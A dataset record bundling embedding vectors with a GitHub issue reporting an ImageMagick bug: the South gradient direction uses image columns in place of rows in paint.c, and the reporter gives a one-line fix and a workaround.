0.015549788251519203, 0.00612057838588953, 0.0001636472443351522, -0.017161084339022636, -0.002442364813759923, -0.0037016787100583315, 0.025076771154999733, -0.0015692536253482103, 0.005811616312712431, -0.02531142719089985, 0.01037956215441227, 0.0015145009383559227, -0.02617182768881321, -0.0037798970006406307, -0.014462554827332497, 0.01864723116159439, -0.0011869620066136122, -0.009628666564822197, 0.00750113045796752, -0.01748960092663765, -0.009440942667424679, -0.0060892910696566105, 0.0034807121846824884, 0.00031898380257189274, 0.015972167253494263, 0.002675064140930772, 0.00014299273607321084, 0.01580008678138256, 0.020555756986141205, 0.024638749659061432, -0.020602688193321228, -0.018256140872836113, 0.006359143648296595, -0.009323615580797195, -0.01864723116159439, -0.002766970545053482, 0.010246590711176395, 0.0032636565156280994, 0.01576097682118416, 0.020571399480104446, 0.0216195248067379, 0.000664855120703578, -0.014978795312345028, -0.00006294124614214525, 0.006488204002380371, 0.001047146855853498, -0.0030583336483687162, 0.02506112866103649, -0.0031326410826295614, 0.0011713183484971523, -0.023105671629309654, 0.0013072225265204906, -0.012131650932133198, 0.011005308479070663, 0.016175534576177597, 0.011591944843530655, 0.0167856365442276, 0.03666871786117554, -0.017035935074090958, 0.012851258739829063, 0.0017863092944025993, -0.017599105834960938, 0.010199660435318947, 0.0022331310901790857, 0.02246428281068802, 0.0014597481349483132, -0.0014079285319894552, -0.008619651198387146, 0.006382609251886606, 0.00015863639418967068, -0.0007479620398953557, 0.014024532400071621, 0.010340453125536442, 0.0020493182819336653, -0.016848212108016014, -0.005271910224109888, 0.00416121119633317, 0.011122635565698147, 0.007051375228911638, -0.011998679488897324, -0.013563045300543308, -0.008306778036057949, -0.007673210464417934, 0.04064220190048218, 0.0075128632597625256, -0.007023999001830816, -0.015025726519525051, 0.002980115357786417, 0.003404449438676238, -0.027845697477459908, 0.01892881654202938, 0.016816923394799232, 0.005385326687246561, 0.0008999987621791661, -0.02018030919134617, 0.01780247502028942, 0.0012260711519047618, -0.01102095190435648, 0.008142519742250443, 0.0006775655783712864, 0.02174467407166958, 0.016394546255469322, -0.0001422594505129382, 0.007993904873728752, -0.014227899722754955, -0.011615410447120667, -0.004536658525466919, -0.01359433215111494, 0.00364301516674459, -0.01835000142455101, 0.0149396862834692, -0.012022145092487335, 0.03397800773382187, -0.023981716483831406, 0.012546207755804062, 0.016519695520401, -0.01835000142455101, -0.0049942354671657085, 0.00437631132081151, -0.02761104330420494, 0.019976941868662834, 0.03231978043913841, 0.013023339211940765, -0.011114813387393951, 0.008017370477318764, -0.0018703939858824015, 0.008267669007182121, 0.010794118978083134, -0.01271828729659319, 0.004251162055879831, 0.014110572636127472, -0.001763821579515934, -0.014267008751630783, -0.00027743037207983434, 0.024106865748763084, 0.008744800463318825, 0.020868629217147827, 0.001439215848222375, -0.00994936190545559, -0.005842903628945351, -0.013696015812456608, -0.00866658240556717, -0.001965233590453863, 0.001967189135029912, -0.01964842528104782, -0.003513955045491457, 0.015205628238618374, 0.01766168139874935, -0.013203240931034088, 0.014705031178891659, 0.004880819004029036, -0.007606725208461285, 0.00029478504438884556, 0.019038323312997818, -0.003294943831861019, 0.0023934785276651382, -0.003312543034553528, 0.02263636142015457, 0.013140666298568249, -0.0008970655617304146, 0.00015313667245209217, -0.009800747036933899, 0.012976408004760742, 0.013422251679003239, -0.004235518164932728, 0.008134698495268822, 0.01053599826991558, -0.004962948150932789, -0.019038323312997818, -0.019319908693432808, 0.009652132168412209, -0.007481575943529606, 0.00044657732360064983, -0.014251365326344967, -0.008995098993182182, -0.03313324972987175, -0.007477664854377508, 0.019116541370749474, -0.016128603368997574, -0.012726109474897385, 0.005619981326162815, 0.013578688725829124, -0.00973817240446806, 0.016441475600004196, -0.014274830929934978, 0.010113620199263096, -0.0015839196275919676, -0.014337405562400818, 0.010676790960133076, -0.005557406693696976, 0.0028549660928547382, 0.015252559445798397, 0.02077476680278778, -0.003930467180907726, 0.00006459116411861032, 0.001988698961213231, 0.01747395657002926, -0.000549483229406178, 0.008650938980281353, 0.009229754097759724, -0.013915026560425758, -0.005005968268960714, 0.004583589732646942, 0.017833761870861053, 0.018537726253271103, 0.011083526536822319, -0.027564112097024918, 0.020696548745036125, 0.005713843274861574, 0.0022526856046169996, 0.004020418040454388, -0.008627473376691341, -0.03210077062249184, -0.005314930342137814, 0.0018293294124305248, -0.013946314342319965, 0.005193691700696945, 0.058225665241479874, -0.0005607270868495107, 0.007860934361815453, 0.008838662877678871, 0.00098750542383641, 0.0031795718241482973, -0.00041113467887043953, 0.00579206133261323, -0.007853112183511257, 0.011928283609449863, -0.00750113045796752, 0.008713513612747192, 0.014501663856208324, -0.008439749479293823, -0.003208903828635812, -0.006132310722023249, 0.002321126637980342, -0.03070848621428013, 0.001214338350109756, -0.013852451927959919, -0.02291794866323471, 0.00789613276720047, 0.017145439982414246, 0.005921121686697006, -0.003961754497140646, 0.004321558400988579, 0.005925032775849104, -0.012945120222866535, 0.015291668474674225, -0.026547275483608246, 0.03172532469034195, 0.0066798385232687, -0.0016103183152154088, 0.006159687414765358, 0.014423445798456669, 0.02615618333220482, -0.007364248391240835, 0.021103285253047943, -0.0015614317962899804, -0.013422251679003239, -0.004122101701796055, -0.012053432874381542, -0.01515869703143835, -0.007450288627296686, -0.0011234096018597484, -0.0007352515822276473, -0.020430607721209526, -0.025577368214726448, 0.010152729228138924, 0.0071256826631724834, -0.008744800463318825, 0.030129671096801758, 0.013891561888158321, 0.01991436630487442, 0.005068542901426554, 0.003502222243696451, 0.01130253728479147, -0.0024736521299928427, -0.011396399699151516, 0.006394342053681612, -0.024795185774564743, -0.0015780532266944647, -0.00707484083250165, -0.036042969673871994, -0.02260507456958294, 0.010911446064710617, 0.006288747303187847, 0.00958955753594637, 0.0011458974331617355, 0.038076646625995636, 0.0023817457258701324, 0.006222262047231197, -0.02388785406947136, -0.021588237956166267, 0.005874190479516983, -0.0017951088957488537, 0.00640216376632452, -0.01301551703363657, -0.007860934361815453, 0.006390430964529514, 0.006992711685597897, -0.01344571728259325, -0.007954795844852924, 0.002635955112054944, -0.005666912533342838, -0.00937836803495884, -0.005099830217659473, -0.014110572636127472, -0.009339259006083012, 0.013477005064487457, 0.01922604627907276, 0.023011809214949608, -0.005373593885451555, -0.009792924858629704, 0.01709851063787937, -0.0037075451109558344, -0.004747848026454449, 0.024998553097248077, 0.0010598573135212064, 0.004403687547892332, -0.001481258193962276, -0.006175330840051174, -0.03723188862204552, 0.008275491185486317, 0.0008393796160817146, -0.0284714438021183, 0.00014727030065841973, 0.005631714127957821, -0.01436087116599083, 0.020383676514029503, -0.005150672048330307, 0.007821825332939625, 0.0083928182721138, -0.0028139015194028616, 0.011114813387393951, 0.015166519209742546, -0.01109134778380394, 0.018115347251296043, -0.007465932052582502, 0.010277878493070602, -0.011685807257890701, -0.00031409517396241426, 0.017849404364824295, 0.005592605099081993, -0.013758590444922447, -0.0019241690170019865, -0.015166519209742546, 0.003934378270059824, 0.002418899443000555, -0.007688854355365038, -0.016316328197717667, -0.011951749213039875, 0.02618747018277645, 0.004243340343236923, -0.010137085802853107, 0.005729487165808678, 0.0049081952311098576, 0.02246428281068802, 0.0052953758276999, -0.0035765296779572964, -0.005932854488492012, 0.05037255585193634, -0.0284714438021183, -0.013883739709854126, 0.0007548061548732221, 0.01591741479933262, -0.017004648223519325, -0.01558107603341341, -0.018428219482302666, -0.014329583384096622, 0.00952698290348053, 0.020587043836712837, 0.014564238488674164, -0.009480051696300507, -0.003187393769621849, 0.009871142916381359, 0.01059857290238142, 0.028268076479434967, 0.010786296799778938, -0.005643446929752827, -0.009120248258113861, 0.0031482847407460213, 0.0003297388320788741, 0.01576097682118416, 0.010606395080685616, -0.010887980461120605, 0.010176194831728935, 0.0020336746238172054, 0.009620845317840576, 0.0009283528779633343, -0.00019126807455904782, 0.005005968268960714, -0.005088097415864468, -0.0008354687015525997, 0.004888640716671944, 0.013680372387170792, -0.011873530223965645, -0.012679178267717361, -0.016566624864935875, 0.003551108529791236, 0.013023339211940765, 0.016457119956612587, -0.015690581873059273, 0.013328390195965767, 0.028674811124801636, -0.017020290717482567, -0.0053618610836565495, -0.014399980194866657, 0.015612362883985043, 0.010285699740052223, 0.011200853623449802, -0.01590959168970585, 0.005506564863026142, 0.007555882912129164, -0.003195215482264757, 0.02147873118519783, -0.01680128090083599, -0.019398126751184464, 0.026562917977571487, -0.015995632857084274, 0.004184676334261894, -0.01215511653572321, 0.005412702914327383, 0.013492648489773273 ]
null
null
null
null
null
null
null
null
null
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.1-28 ### Operating system Windows ### Operating system, version and so on Windows 11 ### Description There seems to be a bug in `-define gradient:direction=South gradient: ...`. ### Steps to Reproduce ``` magick -size 200x300 -define gradient:direction=South gradient:Red-Blue x.png ``` The result, x.png, is shown below. The expected result is a smooth gradient from red at the top (y=0) to blue at the bottom (y=299). In fact, the image is blue at y=199. The problem seems to be in paint.c, function GradientImage(), which includes: ``` case SouthGravity: { gradient->gradient_vector.x1=0.0; gradient->gradient_vector.y1=0.0; gradient->gradient_vector.x2=0.0; gradient->gradient_vector.y2=(double) image->columns-1; break; } ``` The y2 line should be: ``` gradient->gradient_vector.y2=(double) image->rows-1; ``` A workaround is to use `-define gradient:direction=North` with the colours in the opposite direction. ### Images ![x](https://github.com/ImageMagick/ImageMagick/assets/33812368/d4627de6-9d4a-4f58-bb87-3e4c0df6d88c)
-define gradient:direction=South gradient: ...
https://api.github.com/repos/ImageMagick/ImageMagick/issues/7208/comments
1
2024-04-01T15:26:48
2024-04-01T19:42:25Z
https://github.com/ImageMagick/ImageMagick/issues/7208
2,218,499,308
7,208
false
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : -define gradient:direction=South gradient: ... Issue date: --- start body --- ### ImageMagick version 7.1.1-28 ### Operating system Windows ### Operating system, version and so on Windows 11 ### Description There seems to be a bug in `-define gradient:direction=South gradient: ...`. ### Steps to Reproduce ``` magick -size 200x300 -define gradient:direction=South gradient:Red-Blue x.png ``` The result, x.png, is shown below. The expected result is a smooth gradient from red at the top (y=0) to blue at the bottom (y=299). In fact, the image is blue at y=199. The problem seems to be in paint.c, function GradientImage(), which includes: ``` case SouthGravity: { gradient->gradient_vector.x1=0.0; gradient->gradient_vector.y1=0.0; gradient->gradient_vector.x2=0.0; gradient->gradient_vector.y2=(double) image->columns-1; break; } ``` The y2 line should be: ``` gradient->gradient_vector.y2=(double) image->rows-1; ``` A workaround is to use `-define gradient:direction=North` with the colours in the opposite direction. ### Images ![x](https://github.com/ImageMagick/ImageMagick/assets/33812368/d4627de6-9d4a-4f58-bb87-3e4c0df6d88c) --- end body ---
1,373
[ -0.015863245353102684, 0.03025871515274048, -0.0019370376830920577, 0.029157886281609535, 0.0029231980443000793, 0.026843320578336716, -0.0005177782732062042, 0.03373056650161743, -0.04479531943798065, 0.007945735938847065, -0.005130150821059942, 0.0016256649978458881, 0.0539124496281147, 0.028169961646199226, -0.039375849068164825, 0.055831845849752426, -0.02771833911538124, 0.018079018220305443, -0.02327267825603485, -0.00981573574244976, -0.006343886721879244, -0.017895545810461044, -0.01397207472473383, 0.05916256457567215, -0.04942445084452629, 0.006784924305975437, -0.013612188398838043, 0.015905585139989853, 0.004145754501223564, -0.010980075225234032, 0.029665961861610413, 0.011897433549165726, 0.05614233762025833, 0.017189886420965195, 0.02283516898751259, 0.02960950881242752, 0.012631320394575596, 0.055831845849752426, -0.004861999768763781, 0.026504602283239365, -0.025615470483899117, -0.05264226347208023, 0.017458036541938782, 0.029524829238653183, -0.042254943400621414, -0.018982263281941414, -0.0011546367313712835, 0.0027238489128649235, -0.030851470306515694, 0.011932716704905033, -0.009166528470814228, -0.03031516820192337, -0.014889433048665524, -0.011001245118677616, -0.02492392435669899, -0.005998113192617893, 0.04118233919143677, 0.05504150688648224, -0.02232709340751171, 0.010394376702606678, -0.0024045377504080534, 0.02383720688521862, -0.02927079237997532, 0.018191924318671227, -0.030484527349472046, -0.026984451338648796, -0.052134186029434204, -0.014430753886699677, -0.020308904349803925, -0.003775282995775342, 0.019518565386533737, -0.029863545671105385, 0.017331019043922424, 0.026307018473744392, 0.0013875046279281378, -0.020492376759648323, 0.04812603443861008, 0.008319735527038574, -0.014578943140804768, 0.002448641462251544, -0.05224709212779999, 0.009272377006709576, -0.09512301534414291, 0.02771833911538124, 0.042537204921245575, 0.01758505590260029, 0.004149282816797495, -0.04250897839665413, -0.019038716331124306, 0.00399403739720583, -0.0056770374067127705, 0.011078867129981518, 0.026744527742266655, -0.033984601497650146, 0.010881282389163971, 0.0045091696083545685, 0.03787984699010849, 0.005493565928190947, -0.06418686360120773, -0.005789943039417267, -0.010881282389163971, -0.0011025943094864488, -0.04950913041830063, 0.0679127499461174, -0.007028377149254084, -0.014134377241134644, -0.006961339619010687, -0.039601657539606094, 0.011862150393426418, 0.07745327800512314, -0.005684094037860632, 0.012419622391462326, -0.02960950881242752, 0.022708149626851082, -0.010203848592936993, 0.01687939651310444, 0.025996526703238487, -0.01886935718357563, 0.02615177258849144, 0.02251056581735611, -0.017951998859643936, -0.004428018815815449, -0.02558724395930767, 0.015764452517032623, -0.03155713155865669, 0.02255290560424328, -0.01802256517112255, 0.005306565668433905, 0.00619569793343544, 0.01323818787932396, 0.010796603746712208, 0.010895395651459694, 0.055916525423526764, -0.011622225865721703, -0.00013286260946188122, -0.008002188056707382, -0.038529057055711746, 0.051287394016981125, -0.019546791911125183, -0.007303584832698107, -0.04010973498225212, -0.053460828959941864, 0.01655479148030281, 0.003644735785201192, -0.013774489983916283, 0.013725093565881252, -0.023752527311444283, 0.005235999822616577, 0.015453961677849293, -0.02001252770423889, -0.03655320778489113, -0.015679772943258286, 0.023653734475374222, -0.0014915895881131291, 0.07050958275794983, 0.008785471320152283, 0.004068132024258375, -0.007053075358271599, 0.015552754513919353, -0.03934762254357338, 0.005560603458434343, 0.008227999322116375, 0.001975849037989974, 0.01597614958882332, -0.012299659661948681, -0.001606259378604591, -0.02544611319899559, 0.01553864125162363, -0.015072905458509922, 0.024556979537010193, -0.011890376918017864, 0.007077773567289114, 0.03003290481865406, -0.022567018866539, -0.046037282794713974, 0.0019440943142399192, 0.0075576226226985455, 0.011368188075721264, 0.03135954588651657, -0.05679154396057129, -0.03087969683110714, -0.03517011180520058, -0.005962830036878586, 0.03310958296060562, 0.0037294148933142424, -0.02393599972128868, 0.012624263763427734, 0.01971615105867386, 0.0141837727278471, 0.017669735476374626, 0.030964376404881477, -0.024133583530783653, 0.02969418838620186, -0.005733490455895662, 0.04174686595797539, 0.015058792196214199, 0.00026484314003027976, -0.029214339330792427, -0.028776830062270164, -0.01449426356703043, 0.04025086760520935, 0.011248226277530193, -0.030795017257332802, -0.018572980538010597, -0.009053622372448444, 0.02269403636455536, -0.032460376620292664, 0.04555743187665939, -0.016004376113414764, -0.041690412908792496, -0.0076211318373680115, -0.0350007526576519, -0.0009094197885133326, 0.020181886851787567, -0.03835969790816307, 0.01380977313965559, 0.006485018879175186, 0.012617207132279873, -0.027675999328494072, -0.0021504999604076147, 0.01929275318980217, -0.00803747121244669, 0.0024698113556951284, -0.00908184889703989, -0.019137509167194366, -0.023667847737669945, -0.00015315035125240684, -0.0060439808294177055, -0.050920452922582626, -0.024373508989810944, -0.011551659554243088, -0.04663003608584404, -0.018601207062602043, -0.017528602853417397, -0.0049537355080246925, -0.0029549526516348124, 0.019504452124238014, 0.009399396367371082, -0.023159772157669067, 0.012821848504245281, 0.025798942893743515, 0.011953886598348618, 0.013739206828176975, -0.017980225384235382, 0.03881131857633591, 0.0006046626949682832, -0.003168415045365691, -0.018855243921279907, -0.002312801778316498, 0.023667847737669945, 0.007049547042697668, 0.004699698183685541, -0.02217184752225876, 0.0033518867567181587, 0.021974263712763786, -0.014127320609986782, -0.008566716685891151, 0.014621282927691936, 0.004607961978763342, -0.01007683016359806, 0.026984451338648796, 0.060178715735673904, 0.005197188351303339, 0.02472633868455887, 0.06988859921693802, -0.023851320147514343, -0.0420009046792984, 0.033222489058971405, -0.007031905464828014, 0.007360037416219711, 0.0038599621038883924, -0.04346867650747299, -0.008051584474742413, -0.02932724356651306, -0.011989169754087925, -0.026179999113082886, -0.0037117735482752323, -0.0318676233291626, 0.031246639788150787, -0.036722563207149506, -0.007846943102777004, 0.028395771980285645, 0.0009129481040872633, 0.016103168949484825, 0.0035971037577837706, 0.0044668298214674, -0.0052712829783558846, -0.031105509027838707, -0.07575969398021698, -0.010175622068345547, -0.006047509144991636, 0.030145810917019844, 0.012116188183426857, 0.0014959999825805426, 0.008517320267856121, -0.006485018879175186, 0.0031543017830699682, -0.033363621681928635, 0.0003126957453787327, 0.0023816036991775036, -0.016187848523259163, -0.009956867434084415, -0.003747056471183896, -0.03429509326815605, 0.005003131926059723, 0.009053622372448444, -0.02345615066587925, 0.0016909386031329632, -0.01156577281653881, 0.005698207300156355, 0.05094867944717407, -0.0037541131023317575, 0.039940375834703445, -0.021353282034397125, -0.020591169595718384, -0.04583969712257385, 0.02663162164390087, -0.03824679180979729, -0.025121508166193962, -0.0022898679599165916, -0.033024903386831284, -0.03313780948519707, -0.008877207525074482, 0.007247131783515215, 0.0329119972884655, -0.00761407520622015, -0.04061780869960785, 0.007726980838924646, -0.052331771701574326, -0.003177235834300518, 0.022496452555060387, -0.0020993396174162626, -0.0007815188146196306, -0.03835969790816307, 0.01599026285111904, -0.02932724356651306, 0.014275508932769299, 0.01920807547867298, -0.009992150589823723, 0.022397659718990326, 0.0040504904463887215, -0.0042233774438500404, 0.011699848808348179, -0.04818248748779297, 0.03031516820192337, -0.027464300394058228, 0.018318943679332733, 0.005193660035729408, 0.05007365718483925, 0.00898305606096983, 0.0008154787356033921, 0.039658110588788986, -0.040504902601242065, -0.014677735045552254, 0.01229260303080082, 0.018290717154741287, 0.011149433441460133, -0.04087184742093086, 0.021691998466849327, -0.010980075225234032, 0.007656414993107319, -0.041492827236652374, -0.00929354690015316, -0.0014624811010435224, -0.009999207220971584, -0.015552754513919353, 0.0005358608323149383, -0.03570641577243805, -0.024105357006192207, -0.014007357880473137, -0.03957343101501465, 0.03183939680457115, -0.041831545531749725, 0.019970187917351723, -0.02327267825603485, -0.033363621681928635, -0.007726980838924646, -0.018276603892445564, -0.011735131964087486, 0.007769320625811815, -0.021268602460622787, 0.018996376544237137, 0.011361131444573402, -0.0545898862183094, 0.003320131916552782, 0.01543984841555357, -0.013562791980803013, -0.022962188348174095, 0.025276754051446915, -0.04307350888848305, -0.05504150688648224, -0.0022298868279904127, -0.006446207407861948, -0.025841282680630684, -0.014056754298508167, 0.021875470876693726, -0.0029426037799566984, -0.022863395512104034, 0.007846943102777004, -0.019885508343577385, 0.0027538395952433348, -0.05670686438679695, 0.05295275151729584, -0.017796754837036133, 0.009935697540640831, 0.044851772487163544, -0.02657516859471798, -0.06734822690486908, 0.006248622667044401, 0.009618151001632214, 0.00756467878818512, 0.0044174338690936565, -0.004011678975075483, 0.02212950959801674, 0.019970187917351723, 0.031670037657022476, 0.00309784896671772, 0.01826249063014984, -0.0364120751619339, 0.0194338858127594, 0.03725886717438698, -0.044908225536346436, -0.013160565868020058, 0.004449188709259033, -0.012377282604575157, -0.01018973533064127, 0.037851620465517044, 0.024486415088176727, 0.008065697737038136, -0.02138150855898857, -0.029214339330792427, -0.032799094915390015, 0.0032760282047092915, -0.01061313133686781, -0.012828905135393143, -0.00808686763048172, -0.03920648992061615, 0.0044174338690936565, 0.006153358146548271, 0.004138697870075703, 0.002870273543521762, 0.04380739480257034, 0.019306866452097893, -0.0032619149424135685, -0.03198052570223808, 0.02132505550980568, -0.0356781892478466, 0.007204791996628046, -0.008524376899003983, -0.01222203765064478, -0.0010726037435233593, 0.041690412908792496, 0.008333848789334297, -0.053940676152706146, 0.031246639788150787, -0.03796452656388283, -0.02653282880783081, -0.005408886820077896, 0.00929354690015316, 0.009138301946222782, -0.02426060289144516, -0.018897583708167076, 0.0059134336188435555, -0.022115396335721016, 0.03739999979734421, -0.0005804056418128312, 0.011544603854417801, -0.007218905258923769, 0.010267358273267746, -0.012624263763427734, 0.04284769669175148, 0.02265169657766819, 0.0008908961899578571, 0.01806490495800972, -0.010486112907528877, 0.02516384795308113, -0.017613282427191734, -0.02737962268292904, 0.04569856449961662, -0.024387622252106667, 0.014430753886699677, -0.04479531943798065, -0.019236302003264427, -0.012497245334088802, 0.01359807513654232, 0.0029743583872914314, 0.03694837540388107, 0.021452074870467186, -0.047843772917985916, 0.018417734652757645, 0.007868112996220589, 0.04166218638420105, 0.01613139547407627, -0.03423864021897316, 0.011989169754087925, 0.018333056941628456, -0.009279433637857437, 0.014254339039325714, 0.04846475273370743, -0.005105452612042427, 0.010422603227198124, 0.01886935718357563, 0.040081508457660675, -0.009420565329492092, 0.006121603772044182, -0.031049055978655815, -0.02009720727801323, -0.016060829162597656, -0.03065388649702072, -0.018558867275714874, 0.022284753620624542, -0.03821856528520584, 0.0064391507767140865, -0.04922686517238617, -0.005818169564008713, -0.01062018796801567, 0.027125583961606026, -0.029355470091104507, 0.0012745989952236414, -0.00824916921555996, -0.017909659072756767, -0.035311244428157806, 0.0020111319608986378, 0.030766790732741356, 0.009448791854083538, 0.0045232828706502914, 0.027012677863240242, 0.0035124244168400764, 0.011911546811461449, 0.015341056510806084, -0.024246489629149437, -0.009187697432935238, 0.019278641790151596, 0.026518715545535088, 0.006209811195731163, 0.020492376759648323, -0.02510739490389824, -0.011812753975391388, 0.02218596078455448, 0.02279282920062542, -0.03152890503406525, 0.022214187309145927, -0.03418218716979027, 0.008009244687855244, -0.005045471712946892, 0.016484225168824196, -0.04592437669634819, 0.0332789421081543, -0.003909358289092779, -0.025149734690785408, -0.007289471570402384, 0.002243999857455492, -0.0012066791532561183, 0.005091339349746704, -0.016484225168824196, 0.04087184742093086, 0.0028349903877824545, 0.010281471535563469, 0.0157503392547369, -0.0057723019272089005, 0.008425584994256496, 0.016667697578668594, -0.002086990512907505, 0.00934294331818819, 0.005243056453764439, -0.017655622214078903, 0.030145810917019844, -0.01123411301523447, -0.03635562211275101, -0.05097690224647522, -0.008333848789334297, -0.013739206828176975, 0.014289622195065022, 0.011438754387199879, 0.0007709339261054993, 0.020040754228830338, 0.00456562265753746, -0.010563735850155354, 0.010246188379824162, -0.014254339039325714, 0.00559235829859972, -0.023442037403583527, -0.015679772943258286, 0.02478279173374176, -0.017387470230460167, -0.019264528527855873, 0.002203424461185932, -0.0026074149645864964, -0.004046962130814791, -0.01848830096423626, -0.010112113319337368, 0.028692150488495827, 0.025460226461291313, -0.004593848716467619, 0.030512753874063492, 0.011311735957860947, 0.014211999252438545, 0.03787984699010849, 0.00829856563359499, -0.019786715507507324, 0.025276754051446915, 0.04612196236848831, -0.010154452174901962, -0.01512935757637024, -0.03206520527601242, 0.006604981143027544, 0.041125886142253876, 0.006513244938105345, 0.018558867275714874, 0.004216320812702179, -0.020562943071126938, 0.025742489844560623, 0.0025015659630298615, -0.01858709380030632, 0.0031190188601613045, -0.006957811303436756, -0.007479999680072069, 0.012236150912940502, -0.02647637575864792, -0.026419924572110176, 0.012158527970314026, -0.027958262711763382, 0.002184018725529313, 0.010514339432120323, -0.03675078973174095, 0.017147546634078026, -0.01584913209080696, -0.00559235829859972, -0.011219999752938747, -0.020915772765874863, -0.038190338760614395, 0.00006946344365132973, -0.007882226258516312, -0.008242112584412098, -0.022298866882920265, 0.0064391507767140865, 0.006954282987862825, 0.021508527919650078, -0.04019441455602646, -0.015298716723918915, -0.010366150178015232, -0.0036694337613880634, -0.0005742310895584524, -0.01603260263800621, -0.011840980499982834, -0.0070707169361412525, 0.014748301357030869, 0.03087969683110714, -0.010112113319337368, 0.02488158456981182, -0.03660966083407402, 0.016286641359329224, -0.01599026285111904, 0.017570942640304565, 0.009794565849006176, -0.012271433137357235, 0.028861507773399353, 0.03756935894489288, 0.0019282168941572309, 0.01011916995048523, 0.015482188202440739, -0.011248226277530193, -0.018191924318671227, 0.0031101980712264776, 0.02109924517571926, 0.015185810625553131, -0.002545669674873352, -0.018460074439644814, 0.012723056599497795, 0.030428074300289154, -0.0056629241444170475, 0.008319735527038574, 0.023258564993739128, 0.01687939651310444, 0.005211301613599062, -0.007536452729254961, 0.03209343180060387, 0.03353298082947731, -0.007451773155480623, 0.034690264612436295, 0.015101131983101368, 0.015101131983101368, 0.013823886401951313, -0.000721978722140193, -0.018431847915053368, 0.0033959904685616493, 0.01249018870294094, -0.047505054622888565, 0.012751282192766666, -0.0332789421081543, 0.011043584905564785, 0.00761407520622015, -0.006174528039991856, -0.013005319982767105, 0.014974112622439861, 0.017189886420965195, 0.02932724356651306, -0.005800527986139059, -0.017203999683260918, -0.0259118489921093, -0.022101283073425293, 0.012200867757201195, 0.008679622784256935, 0.014084980823099613, -0.02379486709833145, -0.010041547007858753, 0.008199773728847504, 0.01953267864882946, 0.0004205294535495341, -0.022905735298991203, -0.007719924207776785, 0.020887546241283417, -0.019377432763576508, 0.030004678294062614, -0.005500622559338808, -0.009914527647197247, -0.02496626414358616, -0.011671622283756733, -0.022425886243581772, -0.020774640142917633, -0.0004904339439235628, 0.0045091696083545685, -0.01934920623898506, -0.05552135780453682, 0.00756467878818512, -0.001503056613728404, 0.025559017434716225, 0.004152811132371426, 0.03384346887469292, 0.023018641397356987, -0.01820603758096695, 0.008623169735074043, 0.008700791746377945, -0.005818169564008713, -0.00920181069523096, 0.00887015089392662, -0.0036482641007751226, -0.01459305640310049, 0.026264678686857224, -0.019941961392760277, -0.013922679238021374, 0.014310792088508606, 0.0178673192858696, -0.0272949431091547, 0.0031543017830699682, -0.013280527666211128, 0.023427924141287804, 0.003676490392535925, -0.008326792158186436, 0.014959999360144138, 0.007846943102777004, -0.015468074940145016, 0.02109924517571926, -0.0252061877399683, -0.014903546310961246, -0.025940075516700745, -0.002932018833234906, -0.034916073083877563, 0.0056135281920433044, -0.0028314620722085238, -0.027591319754719734, -0.008517320267856121, -0.013675698079168797, 0.02709735743701458, -0.005500622559338808, 0.02800060249865055, 0.003715301863849163, -0.01229260303080082, 0.004061075393110514, -0.018417734652757645, -0.0034101037308573723, 0.0024415848311036825, -0.03957343101501465, -0.0026321131736040115, 0.005243056453764439, -0.030145810917019844, -0.007423547096550465, -0.019645584747195244, 0.021494414657354355, 0.015270490199327469, 0.00456209434196353, -0.013068829663097858, -0.04087184742093086, 0.054222941398620605, 0.018093131482601166, -0.00938528310507536, -0.001412202836945653, -0.005235999822616577, -0.03240392357110977, 0.004939622711390257, -0.03127486631274223, -0.013880339451134205, 0.020068980753421783, -0.01613139547407627, 0.010387320071458817, 0.019447999075055122, 0.01251135766506195, 0.015877358615398407, -0.013294640928506851, -0.01584913209080696, -0.012878301553428173, 0.006513244938105345, -0.03906535729765892, -0.023286791518330574, -0.004861999768763781, -0.028790943324565887, -0.031754717230796814, 0.02284928224980831, -0.0350007526576519, 0.016300754621624947, 0.02359728142619133, -0.024147696793079376, 0.012680716812610626, 0.015101131983101368, -0.013033546507358551, 0.0019299810519441962, 0.005715848878026009, -0.0159338116645813, -0.008072754368185997, 0.016343094408512115, -0.02174845151603222, 0.010302641429007053, -0.012165584601461887, -0.020887546241283417, -0.03872663900256157, 0.0048902262933552265, -0.03443622589111328, -0.026419924572110176, 0.003551235655322671, 0.014084980823099613, -0.011897433549165726, -0.008192717097699642, -0.01597614958882332, -0.0007784315967001021, -0.011622225865721703, -0.0012860660208389163, 0.0011705141514539719, 0.01663947105407715, -0.022454112768173218, -0.0006412688526324928, -0.008573773317039013, -0.010775433853268623, 0.005715848878026009, -0.023258564993739128, 0.024472301825881004, -0.025559017434716225, -0.025813056156039238, 0.005987528245896101, 0.003189584705978632, 0.010535509325563908, 0.01768384873867035, 0.0350007526576519, -0.023371471092104912, 0.0003045365447178483, -0.005976943299174309, 0.004078716970980167, -0.010083886794745922, 0.01826249063014984, -0.002685037674382329, -0.018939923495054245, 0.003761169733479619, 0.02355494350194931, 0.012426679022610188, -0.014028527773916721, 0.0257283765822649, -0.038754865527153015, 0.009406452998518944, 0.009265320375561714, -0.008736074902117252, -0.02327267825603485, -0.03514188528060913, -0.002741490490734577, 0.0178673192858696, 0.0009605801315046847, 0.007035433780401945, -0.01349928230047226, 0.004791433922946453, -0.0015154056018218398, 0.019024603068828583, -0.01295592449605465, -0.011516377329826355, 0.00036606131470762193, -0.01939154602587223, -0.011530490592122078, -0.002902028150856495, -0.02661750838160515, -0.005931075196713209, 0.011876263655722141, -0.007247131783515215, -0.009230037219822407, -0.0042868866585195065, 0.012087961658835411, -0.02960950881242752, -0.011523433960974216, 0.008729018270969391, 0.03017403744161129, 0.01764150895178318, -0.03121841326355934, -0.020562943071126938, -0.021508527919650078, 0.008340905420482159, -0.010112113319337368, -0.006389754358679056, -0.003955226391553879, 0.001639778260141611, -0.02510739490389824, 0.03827501833438873, 0.010881282389163971, 0.02227064035832882, 0.023950112983584404, 0.013922679238021374, -0.0015215801540762186, 0.021056905388832092, 0.016103168949484825, -0.02019600011408329, 0.0012340235989540815, -0.01778264157474041, -0.010394376702606678, -0.007014263886958361, 0.013047659769654274, -0.012567810714244843, 0.018657660111784935, 0.006664962042123079, 0.0025862453039735556, 0.013379320502281189, -0.019320979714393616, -0.01109298039227724, 0.041775092482566833, 0.008489093743264675, -0.00640739593654871, -0.000911183946300298, 0.009335886687040329, 0.011015358380973339, -0.0018823490245267749, 0.002106396248564124, -0.015820905566215515, -0.004315113183110952, 0.013019433245062828, -0.001975849037989974, 0.003066094359382987, -0.0027273772284388542, 0.014388415031135082, 0.01333698071539402, -0.008616113103926182, 0.008552603423595428, 0.021452074870467186, 0.00851026363670826, 0.004590320400893688, -0.02269403636455536, -0.02794414944946766, 